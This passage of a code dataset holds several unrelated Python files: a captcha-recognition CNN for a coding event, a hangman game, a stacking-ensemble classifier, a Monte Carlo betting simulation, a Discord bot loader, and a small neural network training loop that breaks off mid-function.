len(dataloader)\n\n return accuracy_rate, loss_rate\n\n\nmodel, criterion = load_checkpoint(filepath, model)\nmodel.to(device)\nvalidate_accuracy_rate, validate_loss_rate = validate_model(model , criterion , 
dataloaders['train'])\n\nprint('For the validation set, the accuracy rate is {:.3}'.format(validate_accuracy_rate))\nprint('For the validation set, the loss rate is {:.3}'.format(validate_loss_rate))\n","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86833722","text":"'''\nThis will be main file which the co-ordinaters of the event will be using to test your\ncode. This file contains two functions:\n\n1. predict: You will be given an rgb image which you will use to predict the output \nwhich will be a string. For the prediction you can use/import code,models from other files or\nlibraries. More detailes given above the function defination.\n\n2. test: This will be used by the co-ordinators to test your code by giving sample \ninputs to the 'predict' function mentioned above. A sample test function is given for your\nreference but it is subject to minor changes during the evaluation. However, note that\nthere won't be any changes in the input format given to the predict function.\n\nMake sure all the necessary functions etc. you import are done from the same directory. And in \nthe final submission make sure you provide them also along with this script.\n'''\n\n\nimport tensorflow as tf \n# from tensorflow import keras\n# from keras import layers\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\n# from tesseract_predict import *\nimport os\nimport glob\nimport shutil\nimport sys\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport imutils\nfrom preprocessing import preprocess \n# from preprocessing1 import preprocess\nfrom keras.models import load_model\n\n'''\nfunction: predict\ninput: image - A numpy array which is an rgb image\noutput: answer - A string which is the full captcha\n\nSuggestion: Try to make your code understandable by including comments and organizing it. For \nthis we encourgae you to write essential function in other files and import them here so that \nthe final code is neat and not too big. 
Make sure you use the same input format and return \nsame output format.\n'''\ndef predict(image):\n model=models.Sequential()\n num_classes=26\n model.add(layers.Conv2D(32,(5,5),padding='valid',activation='relu',input_shape=(64,64,1)))\n model.add(layers.Conv2D(64,(5,5),padding='valid',activation='relu'))\n model.add(layers.MaxPooling2D((2,2)))\n model.add(layers.Conv2D(128,(3,3),activation='relu'))\n model.add(layers.Conv2D(256,(3,3),activation='relu'))\n model.add(layers.MaxPooling2D((2,2)))\n model.add(layers.Dropout(0.25))\n model.add(layers.Flatten())\n model.add(layers.Dense(512,activation='relu'))\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(256,activation='relu'))\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(num_classes,activation='softmax'))\n model.load_weights('model_char5.h5')\n model2 = load_model('46_model.h5')\n class_mapping='0LACdEhHJKMn2PRTUWX3Y5bQ89'\n class_mapping2='0123?56?89A8C?EF?H?JKLM?0PQR5TU?WXY2Qbd???hn9??'\n \n count=0\n total=0\n images,images2=preprocess(image)\n answer=\"\"\n for i in range(len(images2)):\n image1=images[i]\n image2=images2[i]\n result = np.argmax(model.predict(image1))\n result_confidence=np.max(model.predict(image1))\n print(\"model1\",class_mapping[result],result_confidence)\n result2 = np.argmax(model2.predict(image2))\n result_confidence2=np.max(model2.predict(image2))\n print(\"model2\",class_mapping2[result2],result_confidence2)\n if class_mapping2[result2]=='?':\n answer+=(class_mapping[result])\n elif class_mapping[result]=='Q':\n answer+=class_mapping2[result2]\n else:\n if result_confidence2<=result_confidence-0.14:\n answer+=(class_mapping[result])\n else:\n answer+=(class_mapping2[result2])\n return answer \n'''\n Write your code for prediction here.\n '''\n # answer = 'xyzabc' # sample needs to be modified\n\n\n\n'''\nfunction: test\ninput: None\noutput: None\n\nThis is a sample test function which the co-ordinaors will use to test your code. This is\nsubject to change but the imput to predict function and the output expected from the predict\nfunction will not change. \nYou can use this to test your code before submission: Some details are given below:\nimage_paths : A list that will store the paths of all the images that will be tested.\ncorrect_answers: A list that holds the correct answers\nscore : holds the total score. 
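In the sample test below, each fully correct prediction adds 10 points to the score. 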
Keep in mind that scoring is subject to change during testing.\n\nYou can play with these variables and test before final submission.\n'''\ndef test():\n '''\n We will be using a similar template to test your code\n '''\n image_paths = ['corthon.jpeg']\n correct_answers = ['AXCKP']\n score = 0\n\n for i,image_path in enumerate(image_paths):\n image = cv2.imread(image_path) # This input format wont change\n answer = predict(image) # a string is expected\n print(answer)\n if correct_answers[i] == answer:\n score += 10\n \n print('The final score of the participant is',score)\n\n\nif __name__ == \"__main__\":\n test()","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93396443","text":"from .exceptions import *\n\nimport random\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = [\n]\n\n\ndef _get_random_word(list_of_words):\n if not list_of_words:\n raise InvalidListOfWordsException\n return random.choice(list_of_words)\n\n\ndef _mask_word(word):\n if not word:\n raise InvalidWordException\n return '*'*(len(word))\n\n\ndef _uncover_word(answer_word, masked_word, character):\n if not answer_word or not masked_word or len(answer_word)!=len(masked_word):\n raise InvalidWordException\n if len(character)>1 or not character or type(character) != str:\n raise InvalidGuessedLetterException\n \n \n \n list_of_indices=[]\n count=0\n answer_word=answer_word.lower()\n character=character.lower()\n for char in answer_word:\n if character==char:\n list_of_indices.append(count)\n count+=1\n \n masked_word=list(masked_word)\n for index in list_of_indices:\n masked_word[index]=character\n \n return \"\".join(masked_word)\n \n\n\ndef guess_letter(game, letter):\n if game['answer_word']==game['masked_word'] or game['remaining_misses']==0: #checks to see if game already complete\n raise GameFinishedException\n \n letter=letter.lower()\n \n if letter in game['previous_guesses']:\n raise InvalidGuessedLetterException\n \n \n previously_masked=game['masked_word']\n game['masked_word']=_uncover_word(game['answer_word'],game['masked_word'],letter)\n game['previous_guesses'].append(letter)\n if previously_masked==game['masked_word']:\n game['remaining_misses'] -= 1\n \n if game['answer_word']==game['masked_word']:\n raise GameWonException\n if game['remaining_misses']==0:\n raise GameLostException\n \n return game\n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571744065","text":"def binarystring(st,current=0):\n if current == len(st):\n print(st)\n return None\n if st[current] == '?':\n cp = st[:]\n cp[current] = '0'\n binarystring(cp, current+1)\n\n cp = st[:]\n cp[current] = '1'\n binarystring(cp, current+1)\n return None\n else:\n 
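# This character is already fixed ('0' or '1'), so recurse without branching:\n        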
binarystring(st,current+1)\n\n\nbinarystring(list(\"1??0?101\"))","sub_path":"Problems/BinaryStringPattern.py","file_name":"BinaryStringPattern.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637540731","text":"import numpy as np\nfrom sklearn.model_selection import KFold\nimport copy\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nclass StackingModel_v3:\n def __init__(self, topLayer_model, base_model_list,\n n_fold=5, use_probas=True, average_probas=False, val_weight_average=False, val_set=[]):\n self.topLayer_model = topLayer_model\n self.base_model_list = base_model_list #存储M个输入的未训练模型\n self.n_flod = n_fold # 默认5折交叉\n self.use_probas=use_probas\n self.average_probas = average_probas\n self.val_weight_average = val_weight_average\n self.val_set = val_set\n self.weight_lst = []\n\n def fit(self, X_train, y_train):\n X_train, y_train = np.array(X_train), np.array(y_train)\n self.class_inter_dict = self.__build_class_inter_dict(y_train)\n print(self.class_inter_dict)\n\n self.had_train_models = [] # 存储训练好的(M * K)个模型\n for i, model in enumerate(self.base_model_list):\n train_pred = []\n KFold_models = []\n loss_lst = []\n for j, (tra_idx, val_idx) in enumerate(KFold(n_splits=self.n_flod).split(X_train)):\n X_tra, X_val = X_train[tra_idx], X_train[val_idx]\n y_tra, y_val = y_train[tra_idx], y_train[val_idx]\n model.fit(X_tra, y_tra)\n if self.val_set==[]:\n print('#直接用\"构建特征的���证集\"计算损失')\n loss_lst.append(self.__cal_loss(model, X_val, y_val)) #直接用构建特征的验证集计算损失\n else:\n print('#使用\"外部验证集\"计算损失')\n loss_lst.append(self.__cal_loss(model, self.val_set[0], self.val_set[1])) #使用外部验证集计算损失\n KFold_models.append(copy.deepcopy(model))\n if self.use_probas:\n train_pred += model.predict_proba(X_val).tolist()\n else:\n train_pred += [[e]for e in model.predict(X_val)]\n self.weight_lst.append(self.__cal_weight_lst(loss_lst))\n self.had_train_models.append(copy.deepcopy(KFold_models)) #存储训练好的K折模型,用于预测\n\n train_pred = np.array(train_pred)\n if i == 0:\n X_train_stack = train_pred\n else:\n if not self.average_probas:\n X_train_stack = np.c_[X_train_stack, train_pred]\n else:\n #将每个模型的预测,求平均\n X_train_stack += train_pred\n if i == len(self.base_model_list) - 1:\n X_train_stack = X_train_stack / len(self.base_model_list)\n\n # 顶层模型的训练\n self.topLayer_model.fit(X_train_stack, y_train)\n\n def predict(self, X_test):\n return self.__predict_tmp(X_test, out_probas=False)\n\n def predict_proba(self, X_test):\n return self.__predict_tmp(X_test, out_probas=True)\n\n def __predict_tmp(self, X_test, out_probas=False): # 测试集的数据是X_test_stack,而不是原来的X_test\n for i, KF_models in enumerate(self.had_train_models):\n test_pred = []\n for model in KF_models:\n if self.use_probas:\n test_pred.append(model.predict_proba(X_test).tolist())\n else:\n test_pred.append([[e] for e in model.predict(X_test)])\n if self.val_weight_average: #每折加权平均\n test_pred = self.__cal_weight_average(self.weight_lst[i], np.array(test_pred))\n else: #每折直接平均\n test_pred = np.mean(np.array(test_pred), axis=0)\n if i == 0:\n X_test_stack = test_pred\n else:\n if not self.average_probas:\n X_test_stack = np.c_[X_test_stack, test_pred]\n else:\n X_test_stack += test_pred\n if i == len(self.base_model_list) - 1:\n X_test_stack = X_test_stack / len(self.base_model_list)\n # 顶层模型预测\n if out_probas:\n return self.topLayer_model.predict_proba(X_test_stack)\n else:\n return 
self.topLayer_model.predict(X_test_stack)\n\n def __cal_weight_average(self, kw_lst, test_pred):\n test_weight_average = []\n for kw, test_single in zip(kw_lst, test_pred):\n test_weight_average.append(kw * test_single)\n return np.sum(test_weight_average, axis=0)\n\n def __cal_weight_lst(self, loss_lst):\n print('每一折的损失:', loss_lst)\n Sk_sum = 0\n for sj in loss_lst:\n Sk_sum += (1 / sj)\n weight_lst = []\n for sk in loss_lst:\n weight_lst.append((1 / sk) / Sk_sum)\n\n print('每一折对应的模型权重:', weight_lst)\n print('所有权值加起来=', sum(weight_lst))\n return weight_lst\n\n def __cal_loss(self, model, X_val, y_val):\n n_class = len(set(y_val))\n y_pred_proba = model.predict_proba(X_val)\n y_val_oneHot = self.__oneHot(y_val)\n\n #计算损失\n sk = 0\n for i_sample in range(len(y_val)):\n for i_class in range(n_class):\n sk += abs(y_pred_proba[i_sample,i_class] - y_val_oneHot[i_sample,i_class])\n return sk / n_class\n\n def __oneHot(self, y_val):\n inter_encode = np.array([self.class_inter_dict[e] for e in y_val])\n onehot_encoder = OneHotEncoder(sparse=False)\n y_val_ontHot = onehot_encoder.fit_transform(inter_encode.reshape(-1, 1))\n return np.array(y_val_ontHot)\n\n def __build_class_inter_dict(self, y_train):\n y_train_set = set(y_train)\n class_inter_dict = {}\n for i, e in enumerate(y_train_set):\n class_inter_dict[e] = i\n return class_inter_dict\n\n","sub_path":"machine_learning_model/stacking/ensemble_learning_v3.py","file_name":"ensemble_learning_v3.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553372965","text":"\"\"\"\nTests for leabratf.utils.py\n\"\"\"\nimport logging\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom leabratf import tfutils\n\ndef test_repeat():\n \"\"\"\n Test taken from github issue page:\n https://github.com/tensorflow/tensorflow/issues/8246\n \"\"\"\n def np_repeat(tensor, repeats):\n assert len(repeats) == tensor.ndim, \"dimension must match\"\n repeated = tensor\n for axis, repeat in enumerate(repeats):\n repeated = np.repeat(repeated, repeat, axis = axis)\n return repeated\n shape = [1,3,3,3,2]\n repeat = [1,2,2,3,1]\n tensor = np.random.randn(*shape)\n np_repeated_tensor = np_repeat(tensor, repeat)\n tf_tensor = tf.constant(tensor)\n g = tf.get_default_graph()\n tf_new = tfutils.repeat(tf_tensor, repeat)\n with tf.Session(graph=g) as sess:\n tf_repeated_tensor = tf_new.eval()\n assert np.allclose(np_repeated_tensor, tf_repeated_tensor)\n","sub_path":"leabratf/tests/test_tfutils.py","file_name":"test_tfutils.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23451066","text":"#monte carlo simulation used to test the \n#monte carol is used for\n#the first task is\nimport random \nimport matplotlib.pyplot as plt\n\nlower_bust = 31.24\n#we want to have bust rate less than 31.24\nhigher_profit = 63.208\n#we want to have profit percent higher than or equal to 63.4\n\n\n\ndef rollDice():\n\t#notes we commmented the print functions since we used them initialy to debug the function\n\t#after we have emphasised that the function works well we can simply comment them\n\troll = random.randint(1,100)\n\n\tif roll <=50:\n\t\t#print(f\"{roll} roll is 100 you loss what are the odds! 
play again\")\n\t\treturn False\t\n\n\telif roll>50:\n\t\t#print(f\"{roll} roll was 51-100 you win pretty light flash\")\n\t\treturn True\n\t#now come an create simple bettor\n\n\ndef simple_bettor(funds,initial_wager,wager_count):\n\tvalue = funds\n\twager = initial_wager\n\t#now we ate going to plot wagers and values\n\tglobal broke_count\n\tglobal simple_profits\n\tglobal simple_bust\n\twx = []\n\tvy = []\n\n\n\t#the two above lists are used to store some data\n\n\tcurrentWager = 0\n\tstatus = None\n\twhile currentWager < wager_count :\n\t\t\n\t\twx.append(currentWager)\n\t\tvy.append(value)\n\n\t\tif rollDice():\n\t\t\tvalue += wager\n\t\t\tstatus = wager\n\t\t\t#if we roll the dice and we won then we add the wager to our fund\n\t\telse :\n\t\t\tvalue -= wager\n\t\t\tstatus = -wager\n\n\t\tcurrentWager +=1\n\t\t#we add wager so we increment the number of wagers we encountered\n\t\t#print(f\"funds: {value} and you get {status}\")\n\tif value< 0:\n\t\t#so we solve the debt issue\n\t\tsimple_bust += 1\n\t\tvalue = 'broke'\n\n\tplt.plot(wx,vy,'k')\n\tif value>startingFunds:\n\t\tsimple_profits += 1\n\t#black color\n\n\tprint(f\"funds: {value} and you get {status}\")\n\n\n\n#build double wager which has some strategy if he losses he is going to double the wager\n# if he wins he is going to go back with the same old wager\n\n\ndef doubler_bettor(funds,initial_wager,wager_count):\n#video 6\n\n\tvalue = funds\n\twager = initial_wager\n\t#now we ate going to plot wagers and values\n\n\twx = []\n\tvy = []\n\n\t#the two above lists are used to store some data\n\n\tcurrentWager = 1\n\tstatus = None\n\tglobal broke_count\n\tglobal doubler_busts\n\tglobal doubler_profits\n\n\tprevious_wager = 'win'\n\tprevious_wager_amount = initial_wager\n\n\twhile currentWager <= wager_count:\n\t\tif previous_wager=='win':\n\t\t\tprint(\"we win hte last wager. 
great\")\n\t\t\tif rollDice():\n\t\t\t\tvalue += wager\n\t\t\t\tprint (value)\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\t\t\telse :\n\t\t\t\tvalue -= wager\n\t\t\t\tprevious_wager = 'loss'\n\t\t\t\tprint(value)\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\t\tif value < 0:\n\t\t\t\t\tprint(f\"we went broke again after {currentWager} rolls\")\n\t\t\t\t\tdoubler_busts += 1\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\n\t\telif previous_wager=='loss':\n\t\t\tprint('we los the last one so we will be smart and double the wager')\n\t\t\t#v.9\n\t\t\t#we want to solve the debt issue until v.8 \n\t\t\t#so in the cass previous_wager was loss then we\n\t\t\t#make sure that the value we have left is larger than the wager\n\t\t\tif rollDice():\n\t\t\t\twager = previous_wager_amount*2\n\t\t\t\tprint(f\"we won with {wager}\")\n\t\t\t\tif value - wager < 0 :\n\t\t\t\t\twager = value\n\t\t\t\t\t#note we donot want to endup with debt so we make the last wager equals the value\n\t\t\t\tvalue += wager\n\t\t\t\tprint(value)\n\t\t\t\twager = initial_wager\n\t\t\t\tprevious_wager = 'win'\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\telse:\n\t\t\t\twager = previous_wager_amount*2\n\t\t\t\tprint (f\"we lost {wager}\")\n\t\t\t\tif value - wager <0:\n\t\t\t\t\twager = value\n\t\t\t\tvalue -= wager\n\t\t\t\tif value<=0:\n\t\t\t\t\tprint(f\"we went broke after {currentWager} rolls\")\n\t\t\t\t\tdoubler_busts += 1\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\t\tprint(value)\n\t\t\t\tprevious_wager = 'loss'\n\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\tcurrentWager +=1\n\tprint (value)\n\tplt.plot(wx,vy,'c')\n\tif value> startingFunds:\n\t\tdoubler_profits +=1\n\t#cin color is faint blue\n\n\n\ndef multiple_bettor(funds, initial_wager,wager_count):\n\t#the goal of the alogrithm is to define the best percents to wagers with\n\tglobal multiple_busts\n\tglobal multiple_profit\n\n\tvalue = funds\n\twager = initial_wager\n\twx = []\n\tvy = []\n\tcurrentWager = 1\n\tprevious_wager = 'win'\n\n\tprevious_wager_amount = initial_wager\n\n\twhile currentWager <= wager_count:\n\t\tif previous_wager=='win':\n\t\t\t#print(\"we win hte last wager. 
great\")\n\t\t\tif rollDice():\n\t\t\t\tvalue += wager\n\t\t\t#\tprint (value)\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\t\t\telse :\n\t\t\t\tvalue -= wager\n\t\t\t\tprevious_wager = 'loss'\n\t\t\t#\tprint(value)\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\t\tif value < 0:\n\t\t\t#\t\tprint(f\"we went broke again after {currentWager} rolls\")\n\t\t\t\t\tmultiple_busts += 1\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\n\t\telif previous_wager=='loss':\n\t\t\t#print('we los the last one so we will be smart and double the wager')\n\t\t\t#v.9\n\t\t\t#we want to solve the debt issue until v.8 \n\t\t\t#so in the cass previous_wager was loss then we\n\t\t\t#make sure that the value we have left is larger than the wager\n\t\t\tif rollDice():\n\t\t\t\twager = previous_wager_amount*random_multiple\n\n\t\t\t#\tprint(f\"we won with {wager}\")\n\t\t\t\tif value - wager < 0 :\n\t\t\t\t\twager = value\n\t\t\t\t\t#note we donot want to endup with debt so we make the last wager equals the value\n\t\t\t\tvalue += wager\n\t\t\t#\tprint(value)\n\t\t\t\twager = initial_wager\n\t\t\t\tprevious_wager = 'win'\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\telse:\n\t\t\t\twager = previous_wager_amount*random_multiple\n\t\t\t#\tprint (f\"we lost {wager}\")\n\t\t\t\tif value - wager <0:\n\t\t\t\t\twager = value\n\t\t\t\tvalue -= wager\n\t\t\t\tif value<=0:\n\t\t\t#\t\tprint(f\"we went broke after {currentWager} rolls\")\n\t\t\t\t\tmultiple_busts += 1\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\t#\tprint(value)\n\t\t\t\tprevious_wager = 'loss'\n\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\tcurrentWager +=1\n\t\n\t#print (value)\n\t#plt.plot(wx,vy,'c')\n\tif value> funds:\n\t\tmultiple_profit +=1\n\t#cin color is faint blue\n\n\n\n\n\n#commented at the start of vi.15\n# this is part of vi.14 dalmbert\n\n\n\ndef dAlemert (funds,initial_wager,wager_count):\n\t\tglobal da_busts\n\t\tglobal da_profits\n\n\t\tglobal Ret\n\t\tvalue = funds\n\t\twager = initial_wager\n\t\tcurrentWager = 1\n\t\tprevious_wager = 'win'\n\t\tprevious_wager_amount = initial_wager\n\t\t#hte amount of money we are wagering\n\t\twhile currentWager <= wager_count:\n\t\t\tif previous_wager == 'win':\n\t\t\t\tif wager == initial_wager:\n\t\t\t\t\tpass\n\t\t\t\telse :\n\t\t\t\t\twager -= initial_wager\n\t\t\t\t\n\t\t\t\t#print(f\"current wager {wager} value {value}\")\n\t\t\t\t\n\t\t\t\tif rollDice():\n\t\t\t\t\tvalue += wager\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\t\t#print(f\"we won current value: {value}\")\n\t\t\t\telse :\n\t\t\t\t\tvalue -= wager\n\t\t\t\t\tprevious_wager = 'loss'\n\t\t\t\t\t#print(f\"we lost current value {value}\")\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\t\tif value <= 0:\n\t\t\t\t\t\tda_busts += 1\n\t\t\t\t\t\tbreak\n\t\t\telif previous_wager == 'loss':\n\t\t\t\twager = previous_wager_amount+initial_wager\n\t\t\t\tif (value - wager ) <= 0:\n\t\t\t\t\twager = 0\n\t\t\t\t#print(f\"we lost the last wager {wager} \")\n\t\t\t\t\t#we donont want ot enter the debt\n\t\t\t\tif rollDice():\n\t\t\t\t\tvalue += wager\n\t\t\t\t\tprevious_wager = 'win'\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\telse :\n\t\t\t\t\tvalue -= wager\n\t\t\t\t\tprevious_wager_amount = wager\n\n\t\t\t\t\tif value <= 0:\n\t\t\t\t\t\tda_busts +=1\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t# we get in debt we donot want to play any more\n\t\t\n\t\t\tcurrentWager +=1\n\t\tif value > 
\ndef dAlemert (funds,initial_wager,wager_count):\n\t\tglobal da_busts\n\t\tglobal da_profits\n\n\t\tglobal Ret\n\t\tvalue = funds\n\t\twager = initial_wager\n\t\tcurrentWager = 1\n\t\tprevious_wager = 'win'\n\t\tprevious_wager_amount = initial_wager\n\t\t#the amount of money we are wagering\n\t\twhile currentWager <= wager_count:\n\t\t\tif previous_wager == 'win':\n\t\t\t\tif wager == initial_wager:\n\t\t\t\t\tpass\n\t\t\t\telse :\n\t\t\t\t\twager -= initial_wager\n\t\t\t\t\n\t\t\t\t#print(f\"current wager {wager} value {value}\")\n\t\t\t\t\n\t\t\t\tif rollDice():\n\t\t\t\t\tvalue += wager\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\t\t#print(f\"we won, current value: {value}\")\n\t\t\t\telse :\n\t\t\t\t\tvalue -= wager\n\t\t\t\t\tprevious_wager = 'loss'\n\t\t\t\t\t#print(f\"we lost, current value {value}\")\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\t\tif value <= 0:\n\t\t\t\t\t\tda_busts += 1\n\t\t\t\t\t\tbreak\n\t\t\telif previous_wager == 'loss':\n\t\t\t\twager = previous_wager_amount+initial_wager\n\t\t\t\tif (value - wager ) <= 0:\n\t\t\t\t\twager = 0\n\t\t\t\t#print(f\"we lost the last wager {wager} \")\n\t\t\t\t\t#we do not want to go into debt\n\t\t\t\tif rollDice():\n\t\t\t\t\tvalue += wager\n\t\t\t\t\tprevious_wager = 'win'\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\telse :\n\t\t\t\t\tvalue -= wager\n\t\t\t\t\tprevious_wager_amount = wager\n\n\t\t\t\t\tif value <= 0:\n\t\t\t\t\t\tda_busts +=1\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t# we went into debt, so we do not want to play any more\n\t\t\n\t\t\tcurrentWager +=1\n\t\tif value > funds:\n\t\t\tda_profits += 1\n\t\tRet += value\n\n\n\n\n\n\n\nsamplesize = 100\nstartingFunds = 100000\n\nwhile True:\n\t\t\n\twagersize = random.uniform(1.0,1000.00)\n\t#the amount we are wagering\n\twagercount = random.uniform(10,100000)\n\t#the target number of wagers\n\n\twagercount = 100\n\n\n\tda_profits = 0\n\tda_busts = 0\n\tRet = 0\n\t#track how many runs profit, how many go bust,\n\t#and (via Ret) the total money returned across all runs\n\n\tx = 0\n\twhile x< samplesize:\n\n\t\tdAlemert (startingFunds,wagersize,wagercount)\n\t\tx += 1\n\n\tROI = Ret - samplesize*startingFunds\n\tprint(f\"total invested is {samplesize*startingFunds}\")\n\tprint(f\"total return {Ret}\")\n\tprint(f\"the total return on investment is {ROI}\")\n\tprint(f\"bust rate is {da_busts/samplesize*100.00}\")\n\tprint(f\"profit rate is {da_profits/samplesize*100.00}\")\n\n\tprint(\"############################################\")\n\tprint(f\"number of people who make money is {da_profits}\")\n\tprint(\"############################################\")\n\n\n","sub_path":"Monte-Carlo-Comparing-profit.py","file_name":"Monte-Carlo-Comparing-profit.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410058926","text":"import pymel.core as pm\nfrom pymel.internal.plogging import pymelLogger\n\n#===============================================================================\n# GLOBAL FUNCTIONS\n#===============================================================================\n#PRINT\ndef PRINT(msg='', item='', type='info'):\n    printMsg = '|| %s || %s' %(msg.ljust(65), item.ljust(20))\n    \n    if type == 'debug':\n        pymelLogger.debug('\\t\\t\\t%s'%printMsg)\n    elif type == 'info':\n        pymelLogger.info('\\t\\t\\t%s'%printMsg)\n    elif type == 'warning':\n        pymelLogger.warning('\\t%s'%printMsg)\n    elif type == 'error':\n        pymelLogger.error('\\t%s'%printMsg)\n    elif type == 'critical':\n        pymelLogger.critical('\\t%s'%printMsg)\n    else:\n        pymelLogger.error('Cannot Print Message: Invalid Type')\n    \n    return","sub_path":"lib/utils/_archives/20141023/_utils_global.py","file_name":"_utils_global.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617525486","text":"# bot.py\nimport os\nimport discord\nfrom discord.ext import commands\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\nimport dotenv\n\ndotenv.load_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nPREFIX = os.getenv('BOT_PREFIX')\n\nclient = discord.Client()\n\n#sets the prefix for the bot\nclient = commands.Bot(command_prefix=PREFIX)\n\n#Initializer function\n@client.event\nasync def on_ready():\n    print(f'{client.user} has connected to Discord!')\n\"\"\"\nloads an extension; choose from the files in the cogs folder\nParameters:\n    -extension: String which contains the name of the file excluding the extension type\n        example: main\n\"\"\"\n@client.command(hidden = True)\nasync def load(ctx, extension):\n    await ctx.send(f'Loading {extension}...')\n    client.load_extension(f'cogs.{extension}')\n\n\"\"\"\nunloads an extension; choose from the files in the cogs folder\nParameters:\n    -extension: String which contains the name of the file excluding the extension type\n        example: main\n\"\"\"\n@client.command(hidden = True)\nasync def unload(ctx, extension):\n    await ctx.send(f'Unloading {extension}...')\n    client.unload_extension(f'cogs.{extension}')\n\n\"\"\"\nreloads an 
extension; choose from the files in the cogs folder\nParameters:\n    -extension: String which contains the name of the file excluding the extension type\n        example: main\n\"\"\"\n@client.command(hidden = True)\nasync def reload(ctx, extension):\n    await ctx.send(f'Reloading {extension}...')\n    client.unload_extension(f'cogs.{extension}')\n    client.load_extension(f'cogs.{extension}')\n\n#Generic error handling for missing arguments\n@client.event\nasync def on_command_error(ctx, error):\n    if isinstance(error, commands.MissingRequiredArgument):\n        await ctx.send('You are missing arguments in the command, please try again')\n\n#loads all cogs in ./cogs\nfor filename in os.listdir('./cogs'):\n    #only if the file ends in .py\n    if filename.endswith('.py') and '__init__' not in filename:\n        client.load_extension(f'cogs.{filename[:-3]}')\n\n\nclient.run(TOKEN)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166773261","text":"import numpy as np\nfrom numpy import array\nimport random\nimport scipy\nfrom scipy import ndimage\n\nepochs = 100000\ninputLayerSize = 2\nhiddenLayerSizes = [3,6]\noutputLayerSize = 2 #inside and outside of the circle\n\n#randomly generate starting weights. There are weights between every two layers.\nweights = []\nweights.append(np.random.uniform(low = -1.0, size=(inputLayerSize,hiddenLayerSizes[0])))\nfor i in range(len(hiddenLayerSizes)-1):\n    weights.append(np.random.uniform(low = -1.0, size=(hiddenLayerSizes[i],hiddenLayerSizes[i+1])))\nweights.append(np.random.uniform(low = -1.0, size=(hiddenLayerSizes[-1],outputLayerSize)))\n\n#randomly generate starting biases. There is a bias at every layer except the input.\nbiases = []\nfor i in range(len(hiddenLayerSizes)):\n    biases.append(np.random.uniform(low = -1.0, size=(1,hiddenLayerSizes[i])))\nbiases.append(np.random.uniform(low = -1.0, size=(1,outputLayerSize)))\n\n#learning rate (lambda)\nlearnrate = 0.02\n\ndef train(x,c):\n    '''x is the array of inputs and c is the correct output class.\n    Runs one feedforward pass and, on a miss, one backpropagation update.\n    '''\n    global weights, biases\n    activations = [array([x])]\n    input_sums = [array([x])]\n    #Now run feedforward\n    for weight,bias in zip(weights,biases): #weights and biases have the same length, so zip pairs them up\n        input_sums.append(activations[-1].dot(weight)+bias)\n        activations.append(sigmoid(input_sums[-1])) #this line does all the work\n    result = np.argmax(activations[-1])\n    if result != c: #if we didn't choose the right node\n        deltaSigs = []\n        deltaSigs.append(np.copy(input_sums[-1])) #going backwards, 